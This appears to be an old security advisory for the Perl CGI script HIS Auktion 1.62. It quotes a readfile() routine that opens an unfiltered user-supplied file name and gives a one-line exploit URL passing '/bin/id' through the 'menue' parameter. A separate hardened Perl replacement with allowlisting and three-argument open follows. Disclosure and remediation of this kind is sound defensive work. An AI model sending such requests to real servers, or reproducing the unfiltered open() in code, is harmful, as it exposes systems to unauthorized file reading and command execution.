Name : HIS Auktion 1.62: "show files" vulnerability.

About : The script "HIS Auktion 1.62" is a catalog of links CGI script.
The creator's site: http://www.his-software.de

Problem:
-------from auktion.pl-------
sub readfile {
local($filename)=$_[0];
local(@array);
open(f,$filename);
----------------------------
$filename is not filtered for special characters.

Exploit:
lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id

by: UkR-XblP (cuctema@ok.ru)
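
One way to harden readfile(), shown as an added example that is not part of the original advisory or the vendor's code. The name safe_readfile, the $DATA_DIR directory and the allowed file-name pattern are assumptions; the sample file and inputs are constructed.

```perl
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Spec;
use File::Temp qw(tempdir);

# Assumption: every file the script may show lives in one directory.
# A temporary directory stands in for it so the example runs anywhere.
my $DATA_DIR = abs_path(tempdir(CLEANUP => 1));

# Hardened counterpart to readfile(): takes the untrusted "menue" value and
# returns the file's lines, or an empty list when the name is rejected.
sub safe_readfile {
    my ($name) = @_;
    return () unless defined $name;

    # Allowlist a bare file name: letters, digits, "_" and "-", with an
    # optional short extension. Slashes and ".." can never match.
    return () unless $name =~ /\A([A-Za-z0-9_-]{1,64}(?:\.[A-Za-z0-9]{1,8})?)\z/;
    my $clean = $1;

    # Resolve symlinks and confirm the result is still inside $DATA_DIR.
    my $path = abs_path(File::Spec->catfile($DATA_DIR, $clean));
    return () unless defined $path && index($path, "$DATA_DIR/") == 0;
    return () unless -f $path;

    # Three-argument open with an explicit '<' mode and a lexical handle,
    # so nothing in the name is ever treated as open() syntax.
    open(my $fh, '<', $path) or return ();
    my @lines = <$fh>;
    close($fh);
    return @lines;
}

# Constructed demo data: one legitimate menu file.
open(my $out, '>', File::Spec->catfile($DATA_DIR, 'main.txt')) or die "write: $!";
print {$out} "item 1\nitem 2\n";
close($out);

for my $menue ('main.txt', '/bin/id', '../main.txt') {
    my @lines = safe_readfile($menue);
    printf "%-12s -> %s\n", $menue, @lines ? scalar(@lines) . " line(s)" : "rejected";
}
```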